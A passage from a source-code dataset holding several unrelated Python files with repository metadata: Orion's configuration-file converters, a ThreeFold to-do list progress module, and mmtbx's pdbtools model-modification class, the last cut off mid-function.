max_horizon,
freq)
print(df_all)
print("target values:::")
print(df_all[target_column_name])
print("predicted values:::")
print(df_all['predicted'])
# use automl metrics module
scores = metrics.compute_metrics_regression(
df_all['predicted'],
df_all[target_column_name],
list(constants.Metric.SCALAR_REGRESSION_SET),
None, None, None)
print("scores:")
print(scores)
for key, value in scores.items():
run.log(key, value)
print("Simple forecasting model")
rmse = np.sqrt(mean_squared_error(
df_all[target_column_name], df_all['predicted']))
print("[Test Data] \nRoot Mean squared error: %.2f" % rmse)
mae = mean_absolute_error(df_all[target_column_name], df_all['predicted'])
print('mean_absolute_error score: %.2f' % mae)
print('MAPE: %.2f' % MAPE(df_all[target_column_name], df_all['predicted']))
run.log('rmse', rmse)
run.log('mae', mae)
| 36.6
| 79
| 0.683145
|
139ddfda1eb0e72680be2a4207e57dda1829da6d
| 8,857
|
py
|
Python
|
src/orion/core/io/convert.py
|
mnoukhov/orion
|
7849d77344e84ec805207cf4148aecf6f7d6b3d7
|
[
"BSD-3-Clause"
] | 3
|
2019-12-13T03:41:19.000Z
|
2021-06-15T20:14:33.000Z
|
src/orion/core/io/convert.py
|
mnoukhov/orion
|
7849d77344e84ec805207cf4148aecf6f7d6b3d7
|
[
"BSD-3-Clause"
] | null | null | null |
src/orion/core/io/convert.py
|
mnoukhov/orion
|
7849d77344e84ec805207cf4148aecf6f7d6b3d7
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
:mod:`orion.core.worker.convert` -- Parse and generate user script's configuration
==================================================================================
.. module:: convert
:platform: Unix
:synopsis: Defines and instantiates a converter for configuration file types.
Given a file path, infer which configuration file parser/emitter it corresponds to.
Define `Converter` classes with a common interface for many popular configuration
file types.
Currently supported:
- YAML
- JSON
- See below, for configuration agnostic parsing
A `GenericConverter` is provided that tries to parse configuration
files, regardless of their type, according to Oríon's predefined markers.
"""
from abc import (ABC, abstractmethod)
from collections import (defaultdict, deque)
import importlib
import os
from orion.core.utils import (Factory, nesteddict)
def infer_converter_from_file_type(config_path,
regex=None, default_keyword=''):
"""Use filetype extension to infer and build the correct configuration file
converter.
"""
_, ext_type = os.path.splitext(os.path.abspath(config_path))
for klass in Converter.types:
if ext_type in klass.file_extensions:
return klass()
if regex is None:
return GenericConverter(expression_prefix=default_keyword)
return GenericConverter(regex, expression_prefix=default_keyword)
class BaseConverter(ABC):
"""Base class for configuration parsers/generators.
Attributes
----------
file_extensions : list of strings
Strings starting with '.' which identify usually a file type as a
common convention. For instance, ``['.yml', '.yaml']`` for YAML files.
"""
file_extensions = []
@abstractmethod
def parse(self, filepath):
"""Read dictionary out of the configuration file.
Parameters
----------
filepath : str
Full path to the original user script's configuration.
"""
pass
@abstractmethod
def generate(self, filepath, data):
"""Create a configuration file at `filepath` using dictionary `data`."""
pass
class YAMLConverter(BaseConverter):
"""Converter for YAML files."""
file_extensions = ['.yml', '.yaml']
def __init__(self):
"""Try to dynamically import yaml module."""
self.yaml = importlib.import_module('yaml')
def parse(self, filepath):
"""Read dictionary out of the configuration file.
Parameters
----------
file : str
Full path to the original user script's configuration.
"""
with open(filepath) as f:
return self.yaml.safe_load(stream=f)
def generate(self, filepath, data):
"""Create a configuration file at `filepath` using dictionary `data`."""
with open(filepath, 'w') as f:
self.yaml.dump(data, stream=f)
class JSONConverter(BaseConverter):
"""Converter for JSON files."""
file_extensions = ['.json']
def __init__(self):
"""Try to dynamically import json module."""
self.json = importlib.import_module('json')
def parse(self, filepath):
"""Read dictionary out of the configuration file.
Parameters
----------
file : str
Full path to the original user script's configuration.
"""
with open(filepath) as f:
return self.json.load(f)
def generate(self, filepath, data):
"""Create a configuration file at `filepath` using dictionary `data`."""
with open(filepath, 'w') as f:
self.json.dump(data, f)
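# Illustrative sketch, not part of the original module: each concrete converter above
# advertises the extensions it handles; infer_converter_from_file_type() matches on
# these lists before falling back to GenericConverter.
def _file_extension_examples():
    assert '.yaml' in YAMLConverter.file_extensions
    assert '.json' in JSONConverter.file_extensions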
class GenericConverter(BaseConverter):
"""Generic converter for any configuration file type.
For each parameter dimension declared here, one must necessarily
provide a ``name`` keyword inside the `Dimension` building expression.
Implementation details: As this class is supposed to provide a generic
text parser, its semantics are tied to how it is subsequently used. A
template document is created on `parse` and filled with values on
`generate`. This template document constitutes the state of this
`Converter` object.
Dimension should be defined for instance as:
``meaningful_name~uniform(0, 4)``
"""
def __init__(self, regex=r'([\/]?[\w|\/|-]+)~([\+]?.*\)|\-|\>[A-Za-z_]\w*)',
expression_prefix=''):
"""Initialize with the regex expression which will be searched for
to define a `Dimension`.
"""
self.re_module = importlib.import_module('re')
self.regex = self.re_module.compile(regex)
self.expression_prefix = expression_prefix
self.template = None
self.has_leading = defaultdict(str)
self.conflict_msg = "Namespace conflict in configuration file '{}', under '{}'"
def _raise_conflict(self, path, namespace):
raise ValueError(self.conflict_msg.format(path, namespace))
def parse(self, filepath):
r"""Read dictionary out of the configuration file.
Create a template for Python 3 string format and save it as this
object's state, by substituting '{\1}' wherever the pattern
was matched. By default, the first matched group (\1) corresponds
with a dimension's namespace.
.. note:: Namespace in substitution templates does not contain the first '/'.
Parameters
----------
filepath : str
Full path to the original user script's configuration.
"""
with open(filepath) as f:
self.template = f.read()
# Search for Oríon semantic pattern
pairs = self.regex.findall(self.template)
ret = dict(pairs)
# Every namespace given should be unique,
# raise conflict if there are duplicates
if len(pairs) != len(ret):
namespaces = list(zip(*pairs))[0]
for name in namespaces:
if namespaces.count(name) != 1:
self._raise_conflict(filepath, name)
# Create template using each namespace as format key,
# exactly as provided by the user
subst = self.re_module.sub(r'{', r'{{', self.template)
subst = self.re_module.sub(r'}', r'}}', subst)
substituted, num_subs = self.regex.subn(r'{\1!s}', subst)
assert len(ret) == num_subs, "This means an error in the regex. Report bug. Details::\n"\
"original: {}\n, regex:{}".format(self.template, self.regex)
self.template = substituted
# Wrap it in style of what the rest of `Converter`s return
ret_nested = nesteddict()
for namespace, expression in ret.items():
keys = namespace.split('/')
if not keys[0]: # It means that user wrote a namespace starting from '/'
keys = keys[1:] # Safe because of the regex pattern
self.has_leading[namespace[1:]] = '/'
stuff = ret_nested
for i, key in enumerate(keys[:-1]):
stuff = stuff[key]
if isinstance(stuff, str):
# If `stuff` is not a dictionary while traversing the
# namespace path, then this amounts to a conflict which was
# not caught earlier
self._raise_conflict(filepath, '/'.join(keys[:i + 1]))
# If final value is already filled,
# then this must be also due to a conflict
if stuff[keys[-1]]:
self._raise_conflict(filepath, namespace)
# Keep compatibility with `SpaceBuilder._build_from_config`
stuff[keys[-1]] = self.expression_prefix + expression
return ret_nested
def generate(self, filepath, data):
"""Create a configuration file at `filepath` using dictionary `data`."""
unnested_data = dict()
stack = deque()
stack.append(([], data))
while True:
try:
namespace, stuff = stack.pop()
except IndexError:
break
if isinstance(stuff, dict):
for k, v in stuff.items():
stack.append((['/'.join(namespace + [str(k)])], v))
else:
name = namespace[0]
unnested_data[self.has_leading[name] + name] = stuff
document = self.template.format(**unnested_data)
with open(filepath, 'w') as f:
f.write(document)
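# Illustrative sketch, not part of the original module: a minimal parse/generate round
# trip through GenericConverter using a temporary file. The dimension name
# 'learning_rate' and the file contents are hypothetical.
def _generic_converter_example():
    import tempfile
    converter = GenericConverter()
    with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as handle:
        handle.write("lr: learning_rate~uniform(0, 1)\n")
        path = handle.name
    parsed = converter.parse(path)                    # nested dict: {'learning_rate': 'uniform(0, 1)'}
    converter.generate(path, {'learning_rate': 0.5})  # fills the saved template
    with open(path) as handle:
        generated = handle.read()                     # "lr: 0.5\n"
    os.remove(path)
    return parsed, generated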
# pylint: disable=too-few-public-methods,abstract-method
class Converter(BaseConverter, metaclass=Factory):
"""Class used to inject dependency on a configuration file parser/generator.
.. seealso:: `Factory` metaclass and `BaseConverter` interface.
"""
pass
| 33.934866
| 97
| 0.612284
|
ad30bfa1c19b1e9d432e2e6eac4f6d7369e46e29
| 2,956
|
py
|
Python
|
plugins/tff_backend/bizz/todo/__init__.py
|
threefoldfoundation/app_backend
|
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
|
[
"Apache-2.0"
] | null | null | null |
plugins/tff_backend/bizz/todo/__init__.py
|
threefoldfoundation/app_backend
|
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
|
[
"Apache-2.0"
] | 178
|
2017-08-02T12:58:06.000Z
|
2017-12-20T15:01:12.000Z
|
plugins/tff_backend/bizz/todo/__init__.py
|
threefoldfoundation/app_backend
|
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
|
[
"Apache-2.0"
] | 2
|
2018-01-10T10:43:12.000Z
|
2018-03-18T10:42:23.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
from mcfw.rpc import returns, arguments
from plugins.rogerthat_api.api import system
from plugins.tff_backend.bizz import get_tf_token_api_key
from plugins.tff_backend.bizz.rogerthat import put_user_data
from plugins.tff_backend.bizz.todo.hoster import HosterSteps
from plugins.tff_backend.bizz.todo.investor import InvestorSteps
# The 'todo list' functionality is currently not used - consider removing it
@returns()
@arguments(email=unicode, app_id=unicode, step=unicode)
def update_hoster_progress(email, app_id, step):
list_id = 'hoster'
if HosterSteps.should_archive(step):
_remove_list(email, app_id, list_id)
return
progress = HosterSteps.get_progress(step)
_update_list(email, app_id, list_id, progress)
@returns()
@arguments(email=unicode, app_id=unicode, step=unicode)
def update_investor_progress(email, app_id, step):
list_id = 'investor'
if InvestorSteps.should_archive(step):
_remove_list(email, app_id, list_id)
return
progress = InvestorSteps.get_progress(step)
_update_list(email, app_id, list_id, progress)
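# _update_list adds `list_id` to the user's 'todo_lists' user data (if missing)
# and stores the step progress under the 'todo_<list_id>' key.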
@returns()
@arguments(email=unicode, app_id=unicode, list_id=unicode, progress=dict)
def _update_list(email, app_id, list_id, progress):
user_data_keys = ['todo_lists']
api_key = get_tf_token_api_key()
current_user_data = system.get_user_data(api_key, email, app_id, user_data_keys)
user_data = {}
if not current_user_data.get('todo_lists'):
user_data['todo_lists'] = [list_id]
elif list_id not in current_user_data.get('todo_lists'):
user_data['todo_lists'] = current_user_data.get('todo_lists') + [list_id]
user_data['todo_%s' % list_id] = progress
put_user_data(api_key, email, app_id, user_data)
@returns()
@arguments(email=unicode, app_id=unicode, list_id=unicode)
def _remove_list(email, app_id, list_id):
user_data_keys = ['todo_lists']
api_key = get_tf_token_api_key()
current_user_data = system.get_user_data(api_key, email, app_id, user_data_keys)
todo_lists = current_user_data.get('todo_lists') or []
if list_id in todo_lists:
todo_lists.remove(list_id)
user_data = {'todo_lists': todo_lists}
put_user_data(api_key, email, app_id, user_data)
system.del_user_data(api_key, email, app_id, ['todo_%s' % list_id])
| 35.614458
| 84
| 0.743572
|
dc5bd4d485a347280a524d889f9db0a688004898
| 25,993
|
py
|
Python
|
mmtbx/pdbtools.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
mmtbx/pdbtools.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
mmtbx/pdbtools.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
import iotbx.phil
from cctbx import crystal
from mmtbx.refinement import rigid_body
from cctbx.array_family import flex
from libtbx.utils import Sorry
import random
import scitbx.matrix
import sys
import scitbx.rigid_body
from libtbx import group_args
import mmtbx.monomer_library.server
import mmtbx.utils
mon_lib_srv = mmtbx.monomer_library.server.server()
master_params_str = """\
modify
.short_caption = Modify starting model
.style = menu_item scrolled auto_align
{
remove = None
.type = atom_selection
.help = Selection for the atoms to be removed
.short_caption=Remove atom selection
.input_size=400
.style = bold noauto
keep = None
.type = atom_selection
.help = Select atoms to keep
.short_caption=Keep only atom selection
.input_size=400
.style = bold noauto
put_into_box_with_buffer = None
.type = float
.help = Move molecule into center of box
selection = None
.type = atom_selection
.help = Selection for atoms to be modified
.short_caption = Modify atom selection
.input_size=400
.style = bold noauto
flip_symmetric_amino_acids = False
.type = bool
.short_caption = Flip symmetric amino acid side chains
.help = Flip symmetric amino acid side chains
adp
.help = Scope of options to modify ADP of selected atoms
.multiple = True
.short_caption=Modify ADPs
.style = auto_align menu_item parent_submenu:model_modifications noauto
{
atom_selection = None
.type = atom_selection
.help = Selection for atoms to be modified. \\
Overrides parent-level selection.
.short_caption = Modify ADPs for selection
.input_size=400
.style = bold
randomize = False
.type = bool
.help = Randomize ADP within a certain range
.short_caption=Randomize ADPs
set_b_iso = None
.type = float
.help = Set ADP of atoms to set_b_iso
.short_caption=Set isotropic B to
.input_size = 64
convert_to_isotropic = False
.type = bool
.help = Convert atoms to isotropic
convert_to_anisotropic = False
.type = bool
.help = Convert atoms to anisotropic
shift_b_iso = None
.type = float
.help = Add shift_b_iso value to ADP
.short_caption=Increase B_iso by
scale_adp = None
.type = float
.help = Multiply ADP by scale_adp
.short_caption=ADP scale factor
}
sites
.help = Scope of options to modify coordinates of selected atoms
.multiple = True
.short_caption=Modify coordinates
.style = auto_align noauto menu_item parent_submenu:model_modifications
{
atom_selection = None
.type = atom_selection
.help = Selection for atoms to be modified. \\
Overrides parent-level selection.
.input_size=400
.short_caption = Modify sites for selection
.style = bold
shake = None
.type = float
.help = Randomize coordinates with mean error value equal to shake
.short_caption = Randomize coordinates (mean value)
switch_rotamers = max_distant min_distant exact_match fix_outliers
.type=choice(multi=False)
translate = 0 0 0
.type = floats(size=3)
.optional = False
.help = Translational shift (x,y,z)
rotate = 0 0 0
.type = floats(size=3)
.optional = False
.help = Rotational shift (x,y,z)
euler_angle_convention = *xyz zyz
.type = choice
.help = Euler angles convention to be used for rotation
}
occupancies
.help = Scope of options to modify occupancies of selected atoms
.multiple = True
.short_caption=Modify occupancies
.style = noauto menu_item parent_submenu:model_modifications
{
atom_selection = None
.type = atom_selection
.help = Selection for atoms to be modified. \\
Overrides parent-level selection.
.input_size=400
.short_caption = Modify sites for selection
.style = bold
randomize = False
.type = bool
.help = Randomize occupancies within a certain range
.short_caption = Randomize occupancies
set = None
.type = float
.help = Set all or selected occupancies to given value
.short_caption=Set occupancies to
.input_size = 64
}
rotate_about_axis
.style = box auto_align
{
axis = None
.type = str
angle = None
.type = float
atom_selection = None
.type = str
}
change_of_basis = None
.type = str
.short_caption = Change of basis operator
.help = Apply change-of-basis operator (e.g. reindexing operator) to \
the coordinates and symmetry. Example: 'a,c,b'.
renumber_residues = False
.type = bool
.help = Re-number residues
increment_resseq = None
.type = int
.help = Increment residue number
.short_caption = Increment residue numbers by
truncate_to_polyala = False
.type = bool
.help = Truncate a model to poly-Ala.
.short_caption = Truncate to poly-Ala
.style = noauto
truncate_to_polygly = False
.type = bool
.help = Truncate a model to poly-Gly.
.short_caption = Truncate to poly-Gly
.style = noauto
remove_alt_confs = False
.type = bool
.help = Deletes atoms whose altloc identifier is not blank or 'A', and \
resets the occupancies of the remaining atoms to 1.0.
.short_caption = Remove alternate conformers
.style = noauto
always_keep_one_conformer = False
.type = bool
.help = Modifies behavior of remove_alt_confs so that residues with no \
conformer labeled blank or A are not deleted. Silent if remove_alt_confs \
is False.
set_chemical_element_simple_if_necessary = None
.type = bool
.short_caption = Guess element field if necessary
.help = Make a simple guess about what the chemical element is (based on \
atom name and the way how it is formatted) and write it into output file.
set_seg_id_to_chain_id = False
.type = bool
.short_caption = Set segID to chain ID
.help = Sets the segID field to the chain ID (padded with spaces).
.style = noauto
clear_seg_id = False
.type = bool
.short_caption = Clear segID field
.help = Erases the segID field.
.style = noauto
convert_semet_to_met = False
.type = bool
.short_caption = Convert SeMet residues to Met
.style = noauto
convert_met_to_semet = False
.type = bool
.short_caption = Convert Met residues to SeMet
.style = noauto
rename_chain_id
.help = Rename chains
.short_caption = Rename chain ID
.style = box
{
old_id = None
.type = str
.input_size = 50
.short_caption = Old ID
new_id = None
.type = str
.input_size = 50
.short_caption = New ID
}
set_charge
.short_caption = Set atomic charge
.style = box auto_align
{
charge_selection = None
.type = atom_selection
.short_caption = Atom selection
charge = None
.type = int(value_max=7,value_min=-3)
}
neutralize_scatterers = False
.type = bool
.short_caption = Neutralize all atoms in the model
remove_fraction = None
.short_caption = Remove atoms randomly (fraction)
.type = float
random_seed = None
.type = int
.help = Random seed
move_waters_last = False
.type = bool
.short_caption = Move waters to end of model
.help = Transfer waters to the end of the model. Addresses some \
limitations of water picking in phenix.refine.
}
"""
def master_params():
return iotbx.phil.parse(master_params_str, process_includes=False)
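# Hedged usage sketch (illustrative only; assumes an mmtbx `model` object that
# has already been loaded elsewhere):
#   params = master_params().extract().modify
#   params.selection = "chain A"   # restrict edits to a hypothetical selection
#   result = modify(model=model, params=params).get_results()
#   modified_model = result.model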
class modify(object):
def __init__(self, model, params, log = None):
self.log = log
self.params = params
self.model = model
self._neutralize_scatterers()
if not model.crystal_symmetry() or not model.crystal_symmetry().unit_cell():
# Make it up
from cctbx.maptbx.box import shift_and_box_model
model = shift_and_box_model(model, shift_model=False)
self.pdb_hierarchy = model.get_hierarchy()
self.crystal_symmetry = model.crystal_symmetry()
if(self.log is None): self.log = sys.stdout
self.xray_structure = model.get_xray_structure()
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
if(self.params.random_seed is not None):
random.seed(self.params.random_seed)
flex.set_random_seed(self.params.random_seed)
self.top_selection = flex.smart_selection(
flags=flex.bool(self.xray_structure.scatterers().size(), True))
if(self.params.selection is not None):
self.top_selection = flex.smart_selection(
flags=asc.selection(self.params.selection))
self._rotate_about_axis()
self._process_adp()
self._process_sites()
self._process_occupancies()
self._put_in_box()
self._change_of_basis()
# Up to this point we are done with self.xray_structure
self.model.set_xray_structure(self.xray_structure)
self.pdb_hierarchy = self.model.get_hierarchy()
# Now only manipulations that use self.pdb_hierarchy are done
### segID manipulations
if (params.set_seg_id_to_chain_id):
if (params.clear_seg_id):
raise Sorry("Parameter conflict - set_seg_id_to_chain_id=True and "+
"clear_seg_id=True. Please choose only one of these options.")
for atom in self.pdb_hierarchy.atoms():
labels = atom.fetch_labels()
atom.segid = "%-4s" % labels.chain_id
elif (params.clear_seg_id):
for atom in self.pdb_hierarchy.atoms():
atom.segid = " "
if(self.params.set_chemical_element_simple_if_necessary or
self.params.rename_chain_id.old_id or
self.params.renumber_residues or self.params.increment_resseq or
self.params.convert_semet_to_met or
self.params.convert_met_to_semet or
self.params.set_charge.charge or
self.params.truncate_to_polyala or
self.params.truncate_to_polygly or
self.params.remove_alt_confs or
self.params.move_waters_last or
self.params.remove_fraction or
self.params.keep or
self.params.remove):
      # del self.xray_structure # it is invalid below this point
self._set_chemical_element_simple_if_necessary()
self._rename_chain_id()
self._renumber_residues()
self._convert_semet_to_met()
self._convert_met_to_semet()
self._set_atomic_charge()
self._truncate_to_poly_ala()
self._truncate_to_poly_gly()
self._remove_alt_confs()
self._move_waters()
self._remove_atoms()
self._apply_keep_remove()
      # This is a really nasty hack; never repeat it.
      # It is here because there is no clear way to handle
      # such dramatic changes in the number of atoms etc. that were just
      # performed on the hierarchy.
self.pdb_hierarchy.reset_atom_i_seqs()
self.pdb_hierarchy.atoms_reset_serial()
self.model._pdb_hierarchy = self.pdb_hierarchy
self.model._xray_structure = self.pdb_hierarchy.extract_xray_structure(
crystal_symmetry=self.model.crystal_symmetry())
self.model._update_atom_selection_cache()
self.model._update_has_hd()
self.model.get_hierarchy().atoms().reset_i_seq()
def _apply_keep_remove(self):
cn = [self.params.remove, self.params.keep].count(None)
if(not cn in [1,2]):
raise Sorry("'keep' and 'remove' keywords cannot be used simultaneously.")
s1 = self.pdb_hierarchy.atoms_size()
if(self.params.remove is not None):
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = ~asc.selection(self.params.remove)
self.pdb_hierarchy = self.pdb_hierarchy.select(sel)
s2 = self.pdb_hierarchy.atoms_size()
print("Size before:", s1, "size after:", s2, file=self.log)
if(self.params.keep is not None):
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = asc.selection(self.params.keep)
self.pdb_hierarchy = self.pdb_hierarchy.select(sel)
s2 = self.pdb_hierarchy.atoms_size()
print("Size before:", s1, "size after:", s2, file=self.log)
def _change_of_basis(self):
if(self.params.change_of_basis is not None):
print("Applying change-of-basis operator '%s'" % \
self.params.change_of_basis, file=self.log)
from cctbx import sgtbx
cb_op = sgtbx.change_of_basis_op(self.params.change_of_basis)
self.xray_structure = self.xray_structure.change_basis(cb_op)
self.pdb_hierarchy.atoms().set_xyz(self.xray_structure.sites_cart())
print("New symmetry:", file=self.log)
self.xray_structure.crystal_symmetry().show_summary(f=self.log, prefix=" ")
self.crystal_symmetry = self.xray_structure.crystal_symmetry()
def _move_waters(self):
if(self.params.move_waters_last):
print("Moving waters to end of model", file=self.log)
if (len(self.pdb_hierarchy.models()) > 1):
raise Sorry("Rearranging water molecules is not supported for "+
"multi-MODEL structures.")
sel_cache = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
water_sel = sel_cache.selection("resname HOH or resname WAT") # BAD XXX
n_waters = water_sel.count(True)
if (n_waters == 0):
print("No waters found, skipping", file=self.log)
else :
print("%d atoms will be moved." % n_waters, file=self.log)
hierarchy_water = self.pdb_hierarchy.select(water_sel)
hierarchy_non_water = self.pdb_hierarchy.select(~water_sel)
for chain in hierarchy_water.only_model().chains():
hierarchy_non_water.only_model().append_chain(chain.detached_copy())
self.pdb_hierarchy = hierarchy_non_water # does this work?
def _remove_alt_confs(self):
if(self.params.remove_alt_confs):
print("Remove altlocs", file=self.log)
always_keep_one_conformer = self.params.always_keep_one_conformer
self.pdb_hierarchy.remove_alt_confs(
always_keep_one_conformer = self.params.always_keep_one_conformer)
def _truncate_to_poly_gly(self):
if(self.params.truncate_to_polygly):
print("Truncate to poly-gly", file=self.log)
self.pdb_hierarchy.truncate_to_poly_gly()
def _truncate_to_poly_ala(self):
if(self.params.truncate_to_polyala):
print("Truncate to poly-ala", file=self.log)
self.pdb_hierarchy.truncate_to_poly_ala()
def _set_atomic_charge(self):
if(self.params.set_charge.charge_selection is not None):
print("Setting atomic charge", file=self.log)
selection = self.params.set_charge.charge_selection
charge = self.params.set_charge.charge
sel_cache = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
isel = sel_cache.selection(selection).iselection()
self.pdb_hierarchy.set_atomic_charge(iselection=isel, charge=charge)
def _convert_met_to_semet(self):
if(self.params.convert_met_to_semet):
print("Convert MET->MSE", file=self.log)
self.pdb_hierarchy.convert_met_to_semet()
def _convert_semet_to_met(self):
if(self.params.convert_semet_to_met):
print("Convert MSE->MET", file=self.log)
self.pdb_hierarchy.convert_semet_to_met()
def _renumber_residues(self):
if((self.params.increment_resseq) or
(self.params.renumber_residues)):
print("Re-numbering residues", file=self.log)
renumber_from = self.params.increment_resseq
atom_selection = self.params.selection
pdb_hierarchy = self.pdb_hierarchy
selected_i_seqs = None
if (atom_selection is not None):
sel_cache = pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
selected_i_seqs = sel_cache.selection(atom_selection).iselection()
for model in pdb_hierarchy.models():
for chain in model.chains():
if (selected_i_seqs is not None):
chain_i_seqs = chain.atoms().extract_i_seq()
intersection = selected_i_seqs.intersection(chain_i_seqs)
if (len(intersection) == 0):
continue
elif (len(intersection) != len(chain_i_seqs)):
print("Warning: chain '%s' is only partially selected (%d out of %d) - will not renumber." % (chain.id, len(intersection), len(chain_i_seqs)), file=self.log)
continue
if (renumber_from is None):
counter = 1
for rg in chain.residue_groups():
rg.resseq=counter
counter += 1
else :
for rg in chain.residue_groups():
resseq = rg.resseq_as_int()
resseq += renumber_from
rg.resseq = "%4d" % resseq
def _rename_chain_id(self):
if([self.params.rename_chain_id.old_id,
self.params.rename_chain_id.new_id].count(None)==0):
print("Rename chain id", file=self.log)
print("old_id= '%s'"%self.params.rename_chain_id.old_id, file=self.log)
print("new_id= '%s'"%self.params.rename_chain_id.new_id, file=self.log)
self.pdb_hierarchy.rename_chain_id(
old_id = self.params.rename_chain_id.old_id,
new_id = self.params.rename_chain_id.new_id)
def _set_chemical_element_simple_if_necessary(self):
if(self.params.set_chemical_element_simple_if_necessary):
print("Set chemical element", file=self.log)
self.pdb_hierarchy.atoms().set_chemical_element_simple_if_necessary()
def _remove_atoms(self):
if(self.params.remove_fraction is not None):
self.pdb_hierarchy = \
self.pdb_hierarchy.remove_atoms(fraction=self.params.remove_fraction)
def _put_in_box(self):
if(self.params.put_into_box_with_buffer is not None):
result = \
self.xray_structure.orthorhombic_unit_cell_around_centered_scatterers(
buffer_size = self.params.put_into_box_with_buffer)
self.xray_structure.replace_scatterers(result.scatterers())
def _print_action(self, text, selection):
print("%s: selected atoms: %s" % (
text, selection.format_summary()), file=self.log)
def _process_adp(self):
for adp in self.params.adp:
if (adp.atom_selection is None):
selection = self.top_selection
else:
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = asc.selection(adp.atom_selection)
selection = flex.smart_selection(flags=sel)
if (adp.convert_to_isotropic):
self._convert_to_isotropic(selection=selection)
if (adp.convert_to_anisotropic):
self._convert_to_anisotropic(selection=selection)
self._set_b_iso(selection=selection, b_iso=adp.set_b_iso)
self._scale_adp(selection=selection, factor=adp.scale_adp)
self._shift_b_iso(selection=selection, shift=adp.shift_b_iso)
if (adp.randomize):
self._randomize_adp(selection=selection)
def _convert_to_isotropic(self, selection):
self._print_action(
text = "Converting to isotropic ADP",
selection = selection)
self.xray_structure.convert_to_isotropic(selection=selection.indices)
def _convert_to_anisotropic(self, selection):
self._print_action(
text = "Converting to anisotropic ADP",
selection = selection)
self.xray_structure.convert_to_anisotropic(selection=selection.flags)
def _set_b_iso(self, selection, b_iso):
if (b_iso is not None):
self._print_action(
text = "Setting all isotropic ADP = %.3f" % b_iso,
selection = selection)
self.xray_structure.set_b_iso(value=b_iso, selection=selection.flags)
def _scale_adp(self, selection, factor):
if (factor is not None):
self._print_action(
text = "Multiplying all ADP with factor = %.6g" % factor,
selection = selection)
self.xray_structure.scale_adp(factor=factor, selection=selection.flags)
def _shift_b_iso(self, selection, shift):
if (shift is not None):
self._print_action(
text = "Adding shift = %.2f to all ADP" % shift,
selection = selection)
self.xray_structure.shift_us(b_shift=shift, selection=selection.indices)
def _randomize_adp(self, selection):
self._print_action(
text = "Randomizing ADP",
selection = selection)
self.xray_structure.shake_adp(selection=selection.flags)
def _process_sites(self):
if(self.params.flip_symmetric_amino_acids):
self.pdb_hierarchy.flip_symmetric_amino_acids()
self.xray_structure.set_sites_cart(
sites_cart = self.pdb_hierarchy.atoms().extract_xyz())
for sites in self.params.sites:
if (sites.atom_selection is None):
selection = self.top_selection
else:
asc = self.pdb_hierarchy.atom_selection_cache(
special_position_settings=crystal.special_position_settings(
crystal_symmetry = self.crystal_symmetry))
sel = asc.selection(sites.atom_selection)
selection = flex.smart_selection(flags=sel)
self._shake_sites(selection=selection, rms_difference=sites.shake)
self._switch_rotamers(selection=selection, mode=sites.switch_rotamers)
self._rb_shift(
selection=selection,
translate=sites.translate,
rotate=sites.rotate,
euler_angle_convention=sites.euler_angle_convention)
def _switch_rotamers(self, selection, mode):
if(mode is None): return
self._print_action(
text = "Switching rotamers; mode = %s"%mode,
selection = selection)
self.pdb_hierarchy.atoms().set_xyz(self.xray_structure.sites_cart())
self.pdb_hierarchy = mmtbx.utils.switch_rotamers(
pdb_hierarchy=self.pdb_hierarchy,
mode=mode,
selection=selection.flags)
self.xray_structure.set_sites_cart(
sites_cart = self.pdb_hierarchy.atoms().extract_xyz())
def _shake_sites(self, selection, rms_difference):
if (rms_difference is not None):
self._print_action(
text = "Shaking sites (RMS = %.3f)" % rms_difference,
selection = selection)
self.xray_structure.shake_sites_in_place(
rms_difference=rms_difference,
selection=selection.flags)
def _rb_shift(self, selection, translate, rotate, euler_angle_convention):
trans = [float(i) for i in translate]
rot = [float(i) for i in rotate]
    if(len(trans) != 3): raise Sorry("Wrong value: translate= " + str(translate))
    if(len(rot) != 3): raise Sorry("Wrong value: rotate= " + str(rotate))
if ( trans[0] != 0 or trans[1] != 0 or trans[2] != 0
or rot[0] != 0 or rot[1] != 0 or rot[2] != 0):
self._print_action(
text = "Rigid body shift",
selection = selection)
if (euler_angle_convention == "zyz"):
rot_obj = scitbx.rigid_body.rb_mat_zyz(
phi = rot[0],
psi = rot[1],
the = rot[2])
else:
rot_obj = scitbx.rigid_body.rb_mat_xyz(
phi = rot[0],
psi = rot[1],
the = rot[2])
